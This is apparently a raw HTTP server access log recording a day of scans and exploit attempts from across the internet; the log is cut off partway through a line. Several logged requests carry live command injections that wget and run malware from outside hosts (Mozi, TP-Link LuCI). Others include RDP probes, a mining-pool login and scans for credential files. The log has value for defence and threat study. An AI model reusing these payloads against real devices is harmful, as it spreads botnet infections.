- - [01/May/2024 05:07:31] "GET /api/.env HTTP/1.1" 404 - 185.224.128.31 - - [01/May/2024 05:10:32] "GET / HTTP/1.1" 200 - 107.170.227.23 - - [01/May/2024 05:12:08] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 107.170.227.23 - - [01/May/2024 05:12:08] "MGLNDD_203.219.129.101_80" 400 - 80.66.76.121 - - [01/May/2024 05:56:15] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 80.66.76.121 - - [01/May/2024 05:56:15] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 185.170.144.3 - - [01/May/2024 06:58:15] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.170.144.3 - - [01/May/2024 06:58:15] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 123.13.26.46 - - [01/May/2024 07:16:27] code 400, message Bad HTTP/0.9 request type ('27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$') 123.13.26.46 - - [01/May/2024 07:16:27] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 - ---------------------------------------- Exception occurred during processing of request from ('199.45.154.50', 56350) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 199.45.154.50 - - [01/May/2024 07:18:20] "GET / HTTP/1.1" 200 - 199.45.154.50 - - [01/May/2024 07:18:24] "GET / HTTP/1.1" 200 - 199.45.154.50 - - [01/May/2024 07:18:24] code 505, message Invalid HTTP version (2.0) 199.45.154.50 - - [01/May/2024 07:18:24] "PRI * HTTP/2.0" 505 - 199.45.154.50 - - [01/May/2024 07:18:25] code 404, message File not found 199.45.154.50 - - [01/May/2024 07:18:25] "GET /favicon.ico HTTP/1.1" 404 - 117.233.206.53 - - [01/May/2024 07:40:05] "GET / HTTP/1.1" 200 - 106.75.37.54 - - [01/May/2024 07:59:14] "GET / HTTP/1.1" 200 - 106.75.37.54 - - [01/May/2024 07:59:18] "GET /start.sh HTTP/1.1" 200 - 106.75.37.54 - - [01/May/2024 07:59:23] "GET /updateDNS.sh HTTP/1.1" 200 - 181.214.166.113 - - [01/May/2024 08:21:39] code 400, message Bad HTTP/0.9 request type ("¹\\x8d'ä") 181.214.166.113 - - [01/May/2024 08:21:39] "¹\x8d'ä\x85=ÇÒºÆ\x9f\x00´Zkh" 400 - 87.121.69.52 - - [01/May/2024 08:36:37] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [01/May/2024 08:36:37] "CONNECT google.com:443 HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.55', 33930) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.55 - - [01/May/2024 08:40:04] "GET / HTTP/1.1" 200 - 167.94.138.55 - - [01/May/2024 08:40:13] "GET / HTTP/1.1" 200 - 167.94.138.55 - - [01/May/2024 08:40:15] code 505, message Invalid HTTP version (2.0) 167.94.138.55 - - [01/May/2024 08:40:15] "PRI * HTTP/2.0" 505 - 167.94.138.55 - - [01/May/2024 08:40:16] code 404, message File not found 167.94.138.55 - - [01/May/2024 08:40:16] "GET /favicon.ico HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.49', 56868) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.49 - - [01/May/2024 08:46:39] "GET / HTTP/1.1" 200 - 167.94.138.49 - - [01/May/2024 08:46:51] "GET / HTTP/1.1" 200 - 167.94.138.49 - - [01/May/2024 08:46:52] code 505, message Invalid HTTP version (2.0) 167.94.138.49 - - [01/May/2024 08:46:52] "PRI * HTTP/2.0" 505 - 167.94.138.49 - - [01/May/2024 08:46:54] code 404, message File not found 167.94.138.49 - - [01/May/2024 08:46:54] "GET /favicon.ico HTTP/1.1" 404 - 198.235.24.212 - - [01/May/2024 08:47:42] "GET / HTTP/1.0" 200 - 45.156.129.57 - - [01/May/2024 08:54:45] code 404, message File not found 45.156.129.57 - - [01/May/2024 08:54:45] "GET /zabbix/favicon.ico HTTP/1.1" 404 - 45.156.129.57 - - [01/May/2024 08:54:47] code 404, message File not found 45.156.129.57 - - [01/May/2024 08:54:47] "GET /favicon.ico HTTP/1.1" 404 - 3.101.230.162 - - [01/May/2024 09:01:22] "HEAD / HTTP/1.1" 200 - 3.101.230.162 - - [01/May/2024 09:01:28] "GET / HTTP/1.1" 200 - 207.90.244.4 - - [01/May/2024 09:08:14] "GET / HTTP/1.1" 200 - 207.90.244.4 - - [01/May/2024 09:08:15] code 404, message File not found 207.90.244.4 - - [01/May/2024 09:08:15] "GET /robots.txt HTTP/1.1" 404 - 207.90.244.4 - - [01/May/2024 09:08:15] code 404, message File not found 207.90.244.4 - - [01/May/2024 09:08:15] "GET /sitemap.xml HTTP/1.1" 404 - 207.90.244.4 - - [01/May/2024 09:08:16] code 404, message File not found 207.90.244.4 - - [01/May/2024 09:08:16] "GET /.well-known/security.txt HTTP/1.1" 404 - 207.90.244.4 - - [01/May/2024 09:08:16] code 404, message File not found 207.90.244.4 - - [01/May/2024 09:08:16] "GET /favicon.ico HTTP/1.1" 404 - 103.245.236.120 - - [01/May/2024 09:32:40] code 404, message File not found 103.245.236.120 - - [01/May/2024 09:32:40] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 162.216.150.134 - - [01/May/2024 09:33:27] "GET / HTTP/1.1" 200 - 84.54.51.41 - - [01/May/2024 09:57:04] code 404, message File not found 84.54.51.41 - - [01/May/2024 09:57:04] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 185.224.128.43 - - [01/May/2024 10:32:26] "GET / HTTP/1.1" 200 - 185.180.140.5 - - [01/May/2024 10:34:07] "GET / HTTP/1.1" 200 - 185.180.140.5 - - [01/May/2024 10:34:21] code 404, message File not found 185.180.140.5 - - [01/May/2024 10:34:21] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 - 35.203.210.152 - - [01/May/2024 10:40:30] "GET / HTTP/1.1" 200 - 185.242.226.10 - - [01/May/2024 10:58:44] "GET / HTTP/1.1" 200 - 195.1.144.109 - - [01/May/2024 11:07:22] code 404, message File not found 195.1.144.109 - - [01/May/2024 11:07:22] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 146.19.24.28 - - [01/May/2024 11:22:34] "GET / HTTP/1.1" 200 - 13.52.184.77 - - [01/May/2024 11:41:13] code 501, message Unsupported method ('OPTIONS') 13.52.184.77 - - [01/May/2024 11:41:13] "OPTIONS / HTTP/1.1" 501 - 83.97.73.245 - - [01/May/2024 11:42:15] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 62.210.90.216 - - [01/May/2024 11:56:54] "HEAD / HTTP/1.1" 200 - 62.210.90.216 - - [01/May/2024 11:56:57] "GET / HTTP/1.1" 200 - 62.210.90.216 - - [01/May/2024 11:56:57] code 404, message File not found 62.210.90.216 - - [01/May/2024 11:56:57] "GET /favicon.ico HTTP/1.1" 404 - 62.210.90.216 - - [01/May/2024 11:56:58] code 404, message File not found 62.210.90.216 - - [01/May/2024 11:56:58] "GET /ads.txt HTTP/1.1" 404 - 62.210.90.216 - - [01/May/2024 11:56:59] code 404, message File not found 62.210.90.216 - - [01/May/2024 11:56:59] "GET /app-ads.txt HTTP/1.1" 404 - 62.210.90.216 - - [01/May/2024 11:56:59] code 404, message File not found 62.210.90.216 - - [01/May/2024 11:56:59] "GET /sellers.json HTTP/1.1" 404 - 83.97.73.245 - - [01/May/2024 12:23:57] code 404, message File not found 83.97.73.245 - - [01/May/2024 12:23:57] "GET /actuator/gateway/routes HTTP/1.1" 404 - 185.161.248.199 - - [01/May/2024 12:29:41] "GET / HTTP/1.1" 200 - 216.218.206.66 - - [01/May/2024 13:29:38] "GET / HTTP/1.1" 200 - 216.218.206.66 - - [01/May/2024 13:33:01] code 404, message File not found 216.218.206.66 - - [01/May/2024 13:33:01] "GET /favicon.ico HTTP/1.1" 404 - 216.218.206.66 - - [01/May/2024 13:33:43] code 404, message File not found 216.218.206.66 - - [01/May/2024 13:33:43] "GET /geoserver/web/ HTTP/1.1" 404 - 141.98.11.79 - - [01/May/2024 13:42:54] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [01/May/2024 13:42:54] "CONNECT google.com:443 HTTP/1.1" 501 - 15.204.52.61 - - [01/May/2024 14:15:32] "GET / HTTP/1.1" 200 - 213.32.39.37 - - [01/May/2024 14:19:04] "GET / HTTP/1.1" 200 - 128.199.137.235 - - [01/May/2024 14:23:53] code 404, message File not found 128.199.137.235 - - [01/May/2024 14:23:53] "GET /manager/html HTTP/1.1" 404 - 87.121.69.52 - - [01/May/2024 14:39:56] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [01/May/2024 14:39:56] "CONNECT google.com:443 HTTP/1.1" 501 - 46.101.115.195 - - [01/May/2024 14:51:17] "GET / HTTP/1.1" 200 - 46.101.115.195 - - [01/May/2024 14:51:18] code 404, message File not found 46.101.115.195 - - [01/May/2024 14:51:18] "GET /favicon.ico HTTP/1.1" 404 - 162.243.151.39 - - [01/May/2024 14:53:21] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [01/May/2024 15:22:17] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [01/May/2024 15:48:18] "GET / HTTP/1.1" 200 - 185.189.182.234 - - [01/May/2024 15:57:41] "GET / HTTP/1.1" 200 - 78.153.140.177 - - [01/May/2024 16:35:43] code 404, message File not found 78.153.140.177 - - [01/May/2024 16:35:43] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [01/May/2024 16:35:43] code 400, message Bad request version ('`;¶Æ\\x99Ý\\x9biw»\\x00b\\x13\\x02\\x13\\x03\\x13\\x01À,À0À+À/̨̩\\x00£\\x00\\x9f\\x00¢\\x00\\x9e̪À¯À\\xadÀ$À(À') 78.153.140.177 - - [01/May/2024 16:35:43] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03k&v\x92 £1E\x07SÿH"¢â\x02#\x81\x1b÷Cy\x99ºÚ\x84\x04¹ëô\x12\x99 ÜõÔ\x0d¿îu°Þs5\x1f2\x0e]\x06*°`ø­\x1d`;¶Æ\x99Ý\x9biw»\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 159.65.25.244 - - [01/May/2024 16:40:29] code 400, message Bad request version ('ùâüòRqNÍó\\x9d÷NµE4=\\x11\\x16\\x00\\x01<Ì\\x14Ì\\x13Ì\\x15À0À,À(À$À\\x14À') 159.65.25.244 - - [01/May/2024 16:40:29] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03 iÂ)\x17;ªH\x8c\x8c\x9b~\x98\x1fùâüòRqNÍó\x9d÷NµE4=\x11\x16\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 209.141.40.117 - - [01/May/2024 16:45:07] code 400, message Bad request syntax ('{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44cbWk3V34xXkgZh8V75ghGbbBYf2v25mWMNg4JV7GRghN3rBEnhrpDSCikpraL6mSYRF1SZFm69N4sg2QRtSYZL4EutwYg","pass":"x"}}') 209.141.40.117 - - [01/May/2024 16:45:07] "{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44cbWk3V34xXkgZh8V75ghGbbBYf2v25mWMNg4JV7GRghN3rBEnhrpDSCikpraL6mSYRF1SZFm69N4sg2QRtSYZL4EutwYg","pass":"x"}}" 400 - 106.75.175.181 - - [01/May/2024 16:47:56] code 404, message File not found 106.75.175.181 - - [01/May/2024 16:47:56] "GET /.vscode/sftp.json HTTP/1.1" 404 - 205.210.31.193 - - [01/May/2024 17:22:47] code 400, message Bad request version ('À\\x13À') 205.210.31.193 - - [01/May/2024 17:22:47] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03æXA[f\x16yتºT*\x0foðøû\x87'Ú\x9aXìX¾ÙÞfñ\x14\x06µ  \x8dØÆYRZ\x84Ý.ºUôaXiûÒýÁ>÷ð-µ(\x93¤jÏSr\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 205.210.31.193 - - [01/May/2024 17:22:47] code 400, message Bad request version ('À(À$À\\x14À') 205.210.31.193 - - [01/May/2024 17:22:47] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03£Ñs(Ì \x82sM\x1c\x89ÖfO\x0dîS½\x09\x06¸ÊÏ\x01\x02P\x98\x14,^ù!\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 5.196.102.76 - - [01/May/2024 17:29:08] code 404, message File not found 5.196.102.76 - - [01/May/2024 17:29:08] "GET /favicon.ico HTTP/1.1" 404 - 185.16.38.111 - - [01/May/2024 17:41:53] "GET / HTTP/1.1" 200 - 193.106.29.125 - - [01/May/2024 17:44:48] "GET / HTTP/1.0" 200 - 47.100.251.51 - - [01/May/2024 17:52:42] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:42] "GET http://203.219.129.101:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:42] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:42] "GET http://203.219.129.101:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:44] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:44] "GET http://203.219.129.101:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:44] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:44] "GET http://203.219.129.101:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:45] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:45] "GET http://203.219.129.101:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:46] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:46] "GET http://203.219.129.101:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:46] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:46] "GET http://203.219.129.101:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:47] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:47] "GET http://203.219.129.101:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:48] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:48] "GET http://203.219.129.101:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:48] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:48] "GET http://203.219.129.101:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:49] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:49] "GET http://203.219.129.101:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:50] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:50] "GET http://203.219.129.101:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:50] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:50] "GET http://203.219.129.101:80/pma/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:51] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:51] "GET http://203.219.129.101:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:54] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:54] "GET http://203.219.129.101:80/myadmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:54] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:54] "GET http://203.219.129.101:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:55] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:55] "GET http://203.219.129.101:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:56] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:56] "GET http://203.219.129.101:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:56] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:56] "GET http://203.219.129.101:80/SQL/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:57] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:57] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:58] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:58] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:58] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:58] "GET http://203.219.129.101:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:52:59] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:52:59] "GET http://203.219.129.101:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:00] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:00] "GET http://203.219.129.101:80/admin/pma/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:00] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:00] "GET http://203.219.129.101:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:01] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:01] "GET http://203.219.129.101:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:02] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:02] "GET http://203.219.129.101:80/webadmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:02] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:02] "GET http://203.219.129.101:80/admin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:04] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:04] "GET http://203.219.129.101:80/dbadmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:05] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:05] "GET http://203.219.129.101:80/mysql/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:05] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:05] "GET http://203.219.129.101:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:06] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:06] "GET http://203.219.129.101:80/phpma/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:07] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:07] "GET http://203.219.129.101:80/sqlweb/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:07] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:07] "GET http://203.219.129.101:80/webdb/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:08] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:08] "GET http://203.219.129.101:80/websql/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:09] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:09] "GET http://203.219.129.101:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:10] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:10] "GET http://203.219.129.101:80/php/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:11] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:11] "GET http://203.219.129.101:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:12] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:12] "GET http://203.219.129.101:80/db/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:13] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:13] "GET http://203.219.129.101:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:13] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:13] "GET http://203.219.129.101:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:14] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:14] "GET http://203.219.129.101:80/phpmanager/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:15] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:15] "GET http://203.219.129.101:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:15] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:15] "GET http://203.219.129.101:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 - 47.100.251.51 - - [01/May/2024 17:53:16] code 404, message File not found 47.100.251.51 - - [01/May/2024 17:53:16] "GET http://203.219.129.101:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 - 146.19.24.28 - - [01/May/2024 18:03:08] "GET / HTTP/1.1" 200 - 34.77.126.178 - - [01/May/2024 18:15:17] "GET / HTTP/1.1" 200 - 46.174.191.30 - - [01/May/2024 18:51:30] "GET / HTTP/1.0" 200 - 195.1.144.109 - - [01/May/2024 18:56:33] code 404, message File not found 195.1.144.109 - - [01/May/2024 18:56:33] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 106.75.165.113 - - [01/May/2024 19:38:31] code 404, message File not found 106.75.165.113 - - [01/May/2024 19:38:31] "GET /.git/config HTTP/1.1" 404 - 185.224.128.31 - - [01/May/2024 20:23:15] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [01/May/2024 20:34:23] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:34:23] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:34:30] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:34:30] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:34:36] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:34:36] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:34:50] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:34:50] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:02] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:02] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:03] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:03] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:12] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:12] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:19] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:19] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:27] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:27] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:34] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:34] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:41] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:41] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:48] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:48] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:35:55] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:35:55] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:02] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:02] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:10] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:10] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:22] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:22] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:29] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:29] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:43] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:43] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:44] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:44] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:50] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:50] "PUT /SDK/webLanguage 